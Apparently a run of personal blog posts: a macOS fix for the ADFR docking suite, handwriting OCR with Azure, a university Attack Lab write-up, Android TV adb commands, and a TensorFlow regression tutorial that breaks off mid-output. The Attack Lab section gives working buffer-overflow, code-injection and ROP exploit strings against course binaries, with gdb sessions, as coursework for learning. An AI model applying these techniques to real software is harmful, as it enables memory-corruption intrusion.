ImportError: dlopen(/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/_adfrcc.so, 0x0002): Library not loaded: /Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib
Referenced from: <424BF61E-BF0F-351E-B546-E82EBBD8FBF5> /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/_adfrcc.so
Reason: tried: '/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/libgomp.1.dylib' (no such file), '/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/usr/local/lib/libgomp.1.dylib' (no such file), '/usr/lib/libgomp.1.dylib' (no such file, not in dyld cache)
➜ 3Q47
Sometimes this error is simply output as a segmentation fault, but the root cause is that it cannot find libgomp.1.dylib. I haven't tested whether a newer version of GCC would work. Building GCC 8 yourself is absolutely painful, so we are going to use a copy prebuilt by the Homebrew team.
$ cd ../../
$ pwd
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0
$ curl -L -H "Authorization: Bearer QQ==" -o gcc8amd64.tar.gz https://ghcr.io/v2/homebrew/core/gcc/8/blobs/sha256:438d5902e5f21a5e8acb5920f1f5684ecfe0c645247d46c8d44c2bbe435966b2
$ tar -xzf gcc8amd64.tar.gz
$ cp -r gcc@8/8.5.0/lib/gcc/8/* clean_install/lib/
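The dyld error above shows that clean_install/lib is the first place it searches, so you can quickly confirm the library is now where dyld expects it (optional):
$ ls clean_install/lib/libgomp.1.dylib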
Now, we should be able to go back and run the target generation command:
$ cd ADCP_tutorial_data/3Q47
$ agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
#################################################################
# If you used AGFR in your work, please cite: #
# #
# P.A. Ravindranath S. Forli, D.S. Goodsell, A.J. Olson and #
# M.F. Sanner #
# AutoDockFR: Advances in Protein-Ligand Docking with #
...
$ adcp -t 3Q47.trg -s npisdvd -N 20 -n 1000000 -o 3Q47_redocking -ref 3Q47_pepH.pdb
There you have it. Running ADCP on the newest macOS version against all odds.
I haven't yet looked into fixing/patching agfrgui as I don't use the software. But, if someone reallllly needs to run it on Apple Silicon, I am happy to take a look at monkeypatching it.
In case years down the line the prebuilt version of GCC 8 is not available, let me know so I can replace the link with my mirror.
]]>Here is the original PDF. I made some edits to the content after generating the markdown file
Paper Website is a service that lets you build a website with just pen and paper. I am going to try and replicate the process.
The continuity feature on macOS + iOS lets you scan PDFs directly from your iPhone. I want to be able to scan these pages and automatically run an Automator script that takes the PDF and OCRs the text. Then I can further clean the text and convert from markdown.
I quickly realised that the OCR software I planned on using could not detect my shitty handwriting accurately. I tried using ABBYY FineReader, Prizmo and OCRmyPDF. (ABBYY FineReader and Prizmo support being automated via Automator.)
Now, I could either write neater, or use an external API like Microsoft Azure
In the PDFs, all the scans are saved as images on a page. I extract the image and then send it to Azure's API.
The recognised text had multiple lines breaking in the middle of sentences. Therefore, I use what is called a pilcrow to specify paragraph breaks. But, rather than trying to draw the normal pilcrow, I just write the HTML entity &para;, which is the pilcrow character (¶).
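To give an idea of the pipeline, here is a minimal sketch (not the exact Gist mentioned below): it pulls the first image out of the scanned PDF with PyMuPDF, sends it to Azure's v3.2 Read API, and converts pilcrows into paragraph breaks. The endpoint and key are placeholders you would fill in from your own Azure resource.

import time
import requests
import fitz  # PyMuPDF

ENDPOINT = "https://YOUR-RESOURCE.cognitiveservices.azure.com"  # placeholder
KEY = "YOUR-AZURE-KEY"  # placeholder

def ocr_scanned_pdf(pdf_path):
    doc = fitz.open(pdf_path)
    xref = doc.get_page_images(0)[0][0]        # first image on the first page
    img_bytes = doc.extract_image(xref)["image"]
    # Submit the image to the asynchronous Read API
    resp = requests.post(
        ENDPOINT + "/vision/v3.2/read/analyze",
        headers={"Ocp-Apim-Subscription-Key": KEY,
                 "Content-Type": "application/octet-stream"},
        data=img_bytes,
    )
    resp.raise_for_status()
    op_url = resp.headers["Operation-Location"]
    # Poll until the OCR job finishes
    while True:
        result = requests.get(op_url, headers={"Ocp-Apim-Subscription-Key": KEY}).json()
        if result["status"] in ("succeeded", "failed"):
            break
        time.sleep(1)
    lines = [line["text"]
             for page in result["analyzeResult"]["readResults"]
             for line in page["lines"]]
    # OCR breaks lines mid-sentence: join everything, then honour the pilcrows
    return " ".join(lines).replace("¶", "\n\n")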
I created a GitHub Gist with a sample Python script that takes the PDF and prints the text. A more complete version with Automator scripts and an entire publishing pipeline will be available as a GitHub and Gitea repo soon.
*In Part 2, I will discuss some more features*
]]>Lab 3 for CSCI 2400 @ CU Boulder - Computer Systems
This assignment involves generating a total of five attacks on two programs having different security vulnerabilities. The directions for this lab are detailed but not difficult to follow. Attack Lab Handout
Again, I like using objdump to disassemble the code.
objdump -d ctarget > dis.txt
From the instructions, we know that our task is to get CTARGET to execute the code for touch1 when getbuf executes its return statement, rather than returning to test. Let us look at getbuf in our disassembled code.
0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3                      ret
402608: 48 83 ec 18 sub $0x18,%rsp
We can see that 0x18 (hex) or 24 (decimal) bytes of buffer are allocated to getbuf, since 24 bytes are being subtracted from the stack pointer.
Buffer Overflow: A buffer overrun happens when the size of the data exceeds the memory reserved for the buffer in which we are storing our value.
Now, since we know the buffer size we can try passing the address of the touch1 function after we pad it up with the buffer size.
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
000000000040261e <touch1>:
We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
little
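As a quick sanity check (not required for the lab), Python 3.8+ can produce the little-endian byte string for an address directly via the struct module:

$ python3 -c 'import struct; print(struct.pack("<Q", 0x40261e).hex(" "))'
1e 26 40 00 00 00 00 00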
Now that we have our padding size and the address of the function we need to call, we can write our exploit in ctarget.l1.txt:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
1e 26 40 00 00 00 00 00
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phase 2 involves injecting a small amount of code as part of your exploit string.
Within the file ctarget there is code for a function touch2 having the following C representation: Attack Lab Handout
void touch2(unsigned val)
{
vlevel = 2;
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case, however, you must make it appear to touch2 as if you have passed your cookie as its argument.
Recall that the first argument to a function is passed in register %rdi Attack Lab Handout
This hint tells us that we need to store the cookie in the %rdi register:
movq $0x3e8dee8f,%rdi
retq
To get the byte representation, we need to compile the code and then disassemble it.
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
phase2.s: Assembler messages:
phase2.s: Warning: end of file not at end of a line; newline inserted
phase2.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 8f ee 8d 3e mov $0x3e8dee8f,%rdi
7: c3 ret
Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3. We also need to figure out the address of the %rsp register. Again, looking at the getbuf code:
0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3 ret
We need to find the address of %rsp after calling Gets and sending a really long string. What we are going to do now is add a breakpoint on getbuf, run the program until just after it asks us to enter a string, and then find the address of %rsp.
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./ctarget...
(gdb) b getbuf
Breakpoint 1 at 0x402608: file buf.c, line 12.
(gdb) run
Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget
Cookie: 0x3e8dee8f
Breakpoint 1, getbuf () at buf.c:12
12 buf.c: No such file or directory.
(gdb) disas
Dump of assembler code for function getbuf:
=> 0x0000000000402608 <+0>: sub $0x18,%rsp
0x000000000040260c <+4>: mov %rsp,%rdi
0x000000000040260f <+7>: call 0x4028a9 <Gets>
0x0000000000402614 <+12>: mov $0x1,%eax
0x0000000000402619 <+17>: add $0x18,%rsp
0x000000000040261d <+21>: ret
End of assembler dump.
(gdb) until *0x402614
Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
getbuf () at buf.c:15
15 in buf.c
(gdb) x/s $rsp
0x55621b40: "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
(gdb)
So, the address for %rsp is 0x55621b40. Thus, we can set our ctarget.l2.txt as:
byte representation of ASM code
padding
address of %rsp
address of touch2 function
To get the address of touch2, we can run:
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
000000000040264e <touch2>:
402666: 74 2a je 402692 <touch2+0x44>
4026b2: eb d4 jmp 402688 <touch2+0x3a>
48 c7 c7 8f ee 8d 3e c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
4e 26 40 00 00 00 00 00
Do note that our required padding is 24 bytes; we are only adding 16 bytes of zeroes because our asm code takes up 8 bytes on its own. The goal is a total of 24 bytes before the return address, not 8 + 24 bytes.
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch2!: You called touch2(0x3e8dee8f)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phase 3 also involves a code injection attack, but passing a string as argument.
You will need to include a string representation of your cookie in your exploit string. The string should consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”
Your injected code should set register %rdi to the address of this string
When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie. Attack Lab Handout
Because hexmatch and strncmp might overwrite the buffer allocated for getbuf, we will try to store the data after the function touch3 itself. The rationale is simple: by the time our payload is executed, we will be setting %rdi to point to the cookie. Placing the cookie after the touch3 address in our exploit string ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.
=> The total bytes before the cookie = Buffer (0x18 in our case) + Return address of %rsp (8 bytes, pointing to our injected code) + Address of the touch3 function (8 bytes) = 0x18 + 8 + 8 = 0x28 (hex)

We can use our address for %rsp from Phase 2, and simply add 0x28 to it.

=> 0x55621b40 + 0x28 = 0x55621b68
Again, let us get the binary representation for the ASM code:
movq $0x55621B68, %rdi
retq
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
phase3.s: Assembler messages:
phase3.s: Warning: end of file not at end of a line; newline inserted
phase3.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 68 1b 62 55 mov $0x55621b68,%rdi
7: c3 ret
Thus, our answer is going to be in the form:
asm code
padding
return address / %rsp
touch3 address
cookie string
To quickly get the address for touch3:
0000000000402763 <touch3>:
402781: 74 2d je 4027b0 <touch3+0x4d>
4027d3: eb d1 jmp 4027a6 <touch3+0x43>
We need to use an ASCII to Hex converter to convert the cookie string into hex.
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
3365386465653866
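If xxd is not handy, the same conversion can be done with a Python one-liner:

$ python3 -c 'print(" ".join(format(b, "02x") for b in b"3e8dee8f"))'
33 65 38 64 65 65 38 66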
Thus, our cookie string representation is 33 65 38 64 65 65 38 66
48 c7 c7 68 1B 62 55 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
63 27 40 00 00 00 00 00
33 65 38 64 65 65 38 66
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch3!: You called touch3("3e8dee8f")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phases 1-3 Complete.
For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET using gadgets from your gadget farm. You can construct your solution using gadgets consisting of the following instruction types, and using only the first eight x86-64 registers (%rax–%rdi): movq, popq, ret, nop.
All the gadgets you need can be found in the region of the code for rtarget demarcated by the functions start_farm and mid_farm
You can do this attack with just two gadgets
When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploit string will contain a combination of gadget addresses and data. Attack Lab Handout
What is a ROP attack? Return-oriented programming is a computer security exploit technique in which the attacker uses control of the call stack to indirectly execute cherry-picked machine instructions. https://resources.infosecinstitute.com
Let us check if we can find popq %rax (whose hex encoding is 58) between start_farm and end_farm. The way a normal person would check whether the byte 58 appears between start_farm and end_farm is to find the line numbers for both and then search between those lines. But what if you don't want to move away from the terminal?
Assuming the disassembled code for rtarget is stored in dis2.txt (objdump -d rtarget > dis2.txt):
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 " 58"
16-000000000040281f <getval_373>:
17- 40281f: f3 0f 1e fa endbr64
18: 402823: b8 d3 f5 c2 58 mov $0x58c2f5d3,%eax
19- 402828: c3 ret
20-
--
26-0000000000402834 <setval_212>:
27- 402834: f3 0f 1e fa endbr64
28: 402838: c7 07 58 90 c3 92 movl $0x92c39058,(%rdi)
29- 40283e: c3 ret
30-
--
41-0000000000402854 <setval_479>:
42- 402854: f3 0f 1e fa endbr64
43: 402858: c7 07 58 c7 7f 61 movl $0x617fc758,(%rdi)
44- 40285e: c3 ret
45-
If we were to pick the first one as our gadget, the instruction address is 0x402823, but to get to the byte 58 we need to add 4 bytes:
=> Gadget address = 0x402823 + 0x4 = 0x402827
The PDF already provides the next gadget we are supposed to look for: 48 89 c7 (movq %rax, %rdi).
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 "48 89 c7"
11-0000000000402814 <setval_253>:
12- 402814: f3 0f 1e fa endbr64
13: 402818: c7 07 48 89 c7 94 movl $0x94c78948,(%rdi)
14- 40281e: c3 ret
15-
--
31-000000000040283f <getval_424>:
32- 40283f: f3 0f 1e fa endbr64
33: 402843: b8 48 89 c7 c3 mov $0xc3c78948,%eax
34- 402848: c3 ret
35-
36-0000000000402849 <setval_417>:
37- 402849: f3 0f 1e fa endbr64
38: 40284d: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
39- 402853: c3 ret
40-
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$
We cannot use the first match because there the bytes are followed by 0x94 instead of c3. Either of the next two matches will work (0x90 is a nop; it does nothing but increment the program counter by 1).
Again, we have to account for the offset. Taking 0x402843, we need to add just 1 byte:
=> 0x402843 + 1 = 0x402844
Our answer for this file is going to be:
padding
gadget1
cookie
gadget2
touch2
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ cat dis2.txt | grep touch2
000000000040264e <touch2>:
402666: 74 2a je 402692 <touch2+0x44>
4026b2: eb d4 jmp 402688 <touch2+0x3a>
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
27 28 40 00 00 00 00 00
8f ee 8d 3e 00 00 00 00
44 28 40 00 00 00 00 00
4e 26 40 00 00 00 00 00
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ ./hex2raw < ./rtarget.l2.txt | ./rtarget
Cookie: 0x3e8dee8f
Type string:Touch2!: You called touch2(0x3e8dee8f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
So I have an Android TV; this post covers everything I have tried on it.
These steps should be similar for all Android TVs.
The other option is to go to your router's admin page and check the list of connected devices.
adb connect <IP_ADDRESS> # connect to the TV over the network
adb logcat # stream the device logs
adb shell # open a shell on the TV
pm list packages # list installed packages (run inside the adb shell)
adb install -r package.apk # install or update an APK
adb uninstall com.company.yourpackagename # uninstall a package
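For example, to check whether a particular package is installed (the IP address and package name below are placeholders):

adb connect 192.168.1.42
adb shell pm list packages | grep yourpackagename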
In this tutorial you will learn about polynomial regression and how you can implement it in TensorFlow.
We will be performing polynomial regression using five types of equations: linear, quadratic, cubic, quartic, and quintic.
Regression is a statistical measurement that is used to try to determine the relationship between a dependent variable (often denoted by Y) and a series of varying variables (called independent variables, often denoted by X).
This is a form of regression analysis where the relationship between Y and X is modelled as an nth-degree polynomial in X. Polynomial regression can even fit a non-linear relationship (e.g. when the points don't form a straight line).
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
Even though in this tutorial we will use a Position vs Salary dataset, it is important to know how to create synthetic data.
To create 50 values spaced evenly between 0 and 50, we use NumPy's linspace function
linspace(lower_limit, upper_limit, no_of_observations)
x = np.linspace(0, 50, 50)
y = np.linspace(0, 50, 50)
We use the following function to add noise to the data, so that our values do not lie perfectly along a straight line:
x += np.random.uniform(-4, 4, 50)
y += np.random.uniform(-4, 4, 50)
We will be using https://drive.google.com/file/d/1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9/view (Salary vs Position Dataset)
!wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9' -O data.csv
df = pd.read_csv("data.csv")
df # this gives us a preview of the dataset we are working with
| Position | Level | Salary |
|-------------------|-------|---------|
| Business Analyst | 1 | 45000 |
| Junior Consultant | 2 | 50000 |
| Senior Consultant | 3 | 60000 |
| Manager | 4 | 80000 |
| Country Manager | 5 | 110000 |
| Region Manager | 6 | 150000 |
| Partner | 7 | 200000 |
| Senior Partner | 8 | 300000 |
| C-level | 9 | 500000 |
| CEO | 10 | 1000000 |
We use the salary column as the ordinate (y-coordinate) and the level column as the abscissa (x-coordinate):
abscissa = df["Level"].to_list() # abscissa = [1,2,3,4,5,6,7,8,9,10]
ordinate = df["Salary"].to_list() # ordinate = [45000,50000,60000,80000,110000,150000,200000,300000,500000,1000000]
n = len(abscissa) # no of observations
plt.scatter(abscissa, ordinate)
plt.ylabel('Salary')
plt.xlabel('Position')
plt.title("Salary vs Position")
plt.show()
X = tf.placeholder("float")
Y = tf.placeholder("float")
We first define all the coefficients and the constant as TensorFlow variables, each with a random initial value:
a = tf.Variable(np.random.randn(), name = "a")
b = tf.Variable(np.random.randn(), name = "b")
c = tf.Variable(np.random.randn(), name = "c")
d = tf.Variable(np.random.randn(), name = "d")
e = tf.Variable(np.random.randn(), name = "e")
f = tf.Variable(np.random.randn(), name = "f")
learning_rate = 0.2
no_of_epochs = 25000
deg1 = a*X + b
deg2 = a*tf.pow(X,2) + b*X + c
deg3 = a*tf.pow(X,3) + b*tf.pow(X,2) + c*X + d
deg4 = a*tf.pow(X,4) + b*tf.pow(X,3) + c*tf.pow(X,2) + d*X + e
deg5 = a*tf.pow(X,5) + b*tf.pow(X,4) + c*tf.pow(X,3) + d*tf.pow(X,2) + e*X + f
We use the Mean Squared Error Function
mse1 = tf.reduce_sum(tf.pow(deg1-Y,2))/(2*n)
mse2 = tf.reduce_sum(tf.pow(deg2-Y,2))/(2*n)
mse3 = tf.reduce_sum(tf.pow(deg3-Y,2))/(2*n)
mse4 = tf.reduce_sum(tf.pow(deg4-Y,2))/(2*n)
mse5 = tf.reduce_sum(tf.pow(deg5-Y,2))/(2*n)
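For reference, the quantity being minimised above is the (halved) mean squared error over the $n$ observations:

$$E = \frac{1}{2n}\sum_{i=1}^{n}\left(\hat{y}_i - y_i\right)^2$$

The extra factor of 2 in the denominator matches the code and only rescales the gradients; it does not change the optimum.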
We use the AdamOptimizer for the polynomial functions and GradientDescentOptimizer for the linear function
optimizer1 = tf.train.GradientDescentOptimizer(learning_rate).minimize(mse1)
optimizer2 = tf.train.AdamOptimizer(learning_rate).minimize(mse2)
optimizer3 = tf.train.AdamOptimizer(learning_rate).minimize(mse3)
optimizer4 = tf.train.AdamOptimizer(learning_rate).minimize(mse4)
optimizer5 = tf.train.AdamOptimizer(learning_rate).minimize(mse5)
init=tf.global_variables_initializer()
For each type of equation, we first make the model learn the values of the coefficient(s) and constant; once we get these values, we use them to predict Y values from the X values. We then plot the predictions to compare the actual data and the fitted line.
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(no_of_epochs):
        for (x,y) in zip(abscissa, ordinate):
            sess.run(optimizer1, feed_dict={X:x, Y:y})
        if (epoch+1)%1000==0:
            cost = sess.run(mse1,feed_dict={X:abscissa,Y:ordinate})
            print("Epoch",(epoch+1), ": Training Cost:", cost," a,b:",sess.run(a),sess.run(b))
    training_cost = sess.run(mse1,feed_dict={X:abscissa,Y:ordinate})
    coefficient1 = sess.run(a)
    constant = sess.run(b)
print(training_cost, coefficient1, constant)
Epoch 1000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 2000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 3000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 4000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 5000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 6000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 7000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 8000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 9000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 10000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 11000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 12000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 13000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 14000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 15000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 16000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 17000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 18000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 19000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 20000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 21000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 22000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 23000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 24000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 25000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
88999125000.0 180396.42 -478869.12
predictions = []
for x in abscissa:
    predictions.append((coefficient1*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Linear Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(no_of_epochs):
        for (x,y) in zip(abscissa, ordinate):
            sess.run(optimizer2, feed_dict={X:x, Y:y})
        if (epoch+1)%1000==0:
            cost = sess.run(mse2,feed_dict={X:abscissa,Y:ordinate})
            print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c:",sess.run(a),sess.run(b),sess.run(c))
    training_cost = sess.run(mse2,feed_dict={X:abscissa,Y:ordinate})
    coefficient1 = sess.run(a)
    coefficient2 = sess.run(b)
    constant = sess.run(c)
print(training_cost, coefficient1, coefficient2, constant)
Epoch 1000 : Training Cost: 52571360000.0 a,b,c: 1002.4456 1097.0197 1276.6921
Epoch 2000 : Training Cost: 37798890000.0 a,b,c: 1952.4263 2130.2825 2469.7756
Epoch 3000 : Training Cost: 26751185000.0 a,b,c: 2839.5825 3081.6118 3554.351
Epoch 4000 : Training Cost: 19020106000.0 a,b,c: 3644.56 3922.9563 4486.3135
Epoch 5000 : Training Cost: 14060446000.0 a,b,c: 4345.042 4621.4233 5212.693
Epoch 6000 : Training Cost: 11201084000.0 a,b,c: 4921.1855 5148.1504 5689.0713
Epoch 7000 : Training Cost: 9732740000.0 a,b,c: 5364.764 5493.0156 5906.754
Epoch 8000 : Training Cost: 9050918000.0 a,b,c: 5685.4067 5673.182 5902.0728
Epoch 9000 : Training Cost: 8750394000.0 a,b,c: 5906.9814 5724.8906 5734.746
Epoch 10000 : Training Cost: 8613128000.0 a,b,c: 6057.3677 5687.3364 5461.167
Epoch 11000 : Training Cost: 8540034600.0 a,b,c: 6160.547 5592.3022 5122.8633
Epoch 12000 : Training Cost: 8490983000.0 a,b,c: 6233.9175 5462.025 4747.111
Epoch 13000 : Training Cost: 8450816500.0 a,b,c: 6289.048 5310.7583 4350.6997
Epoch 14000 : Training Cost: 8414082000.0 a,b,c: 6333.199 5147.394 3943.9294
Epoch 15000 : Training Cost: 8378841600.0 a,b,c: 6370.7944 4977.1704 3532.476
Epoch 16000 : Training Cost: 8344471000.0 a,b,c: 6404.468 4803.542 3120.2087
Epoch 17000 : Training Cost: 8310785500.0 a,b,c: 6435.365 4628.1523 2709.1445
Epoch 18000 : Training Cost: 8277482000.0 a,b,c: 6465.5493 4451.833 2300.2783
Epoch 19000 : Training Cost: 8244650000.0 a,b,c: 6494.609 4274.826 1894.3738
Epoch 20000 : Training Cost: 8212349000.0 a,b,c: 6522.8247 4098.1733 1491.9915
Epoch 21000 : Training Cost: 8180598300.0 a,b,c: 6550.6567 3922.7405 1093.3868
Epoch 22000 : Training Cost: 8149257700.0 a,b,c: 6578.489 3747.8362 698.53357
Epoch 23000 : Training Cost: 8118325000.0 a,b,c: 6606.1973 3573.2742 307.3541
Epoch 24000 : Training Cost: 8088001000.0 a,b,c: 6632.96 3399.878 -79.89219
Epoch 25000 : Training Cost: 8058094600.0 a,b,c: 6659.793 3227.2517 -463.03156
8058094600.0 6659.793 3227.2517 -463.03156
predictions = []
for x in abscissa:
    predictions.append((coefficient1*pow(x,2) + coefficient2*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quadratic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
    sess.run(init)
    for epoch in range(no_of_epochs):
        for (x,y) in zip(abscissa, ordinate):
            sess.run(optimizer3, feed_dict={X:x, Y:y})
        if (epoch+1)%1000==0:
            cost = sess.run(mse3,feed_dict={X:abscissa,Y:ordinate})
            print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d:",sess.run(a),sess.run(b),sess.run(c),sess.run(d))
    training_cost = sess.run(mse3,feed_dict={X:abscissa,Y:ordinate})
    coefficient1 = sess.run(a)
    coefficient2 = sess.run(b)
    coefficient3 = sess.run(c)
    constant = sess.run(d)
print(training_cost, coefficient1, coefficient2, coefficient3, constant)
Epoch 1000 : Training Cost: 4279814000.0 a,b,c,d: 670.1527 694.4212 751.4653 903.9527
Epoch 2000 : Training Cost: 3770950400.0 a,b,c,d: 742.6414 666.3489 636.94525 859.2088
Epoch 3000 : Training Cost: 3717708300.0 a,b,c,d: 756.2582 569.3339 448.105 748.23956
Epoch 4000 : Training Cost: 3667464000.0 a,b,c,d: 769.4476 474.0318 265.5761 654.75525
Epoch 5000 : Training Cost: 3620040700.0 a,b,c,d: 782.32324 380.54272 89.39888 578.5136
Epoch 6000 : Training Cost: 3575265800.0 a,b,c,d: 794.8898 288.83356 -80.5215 519.13654
Epoch 7000 : Training Cost: 3532972000.0 a,b,c,d: 807.1608 198.87044 -244.31102 476.2061
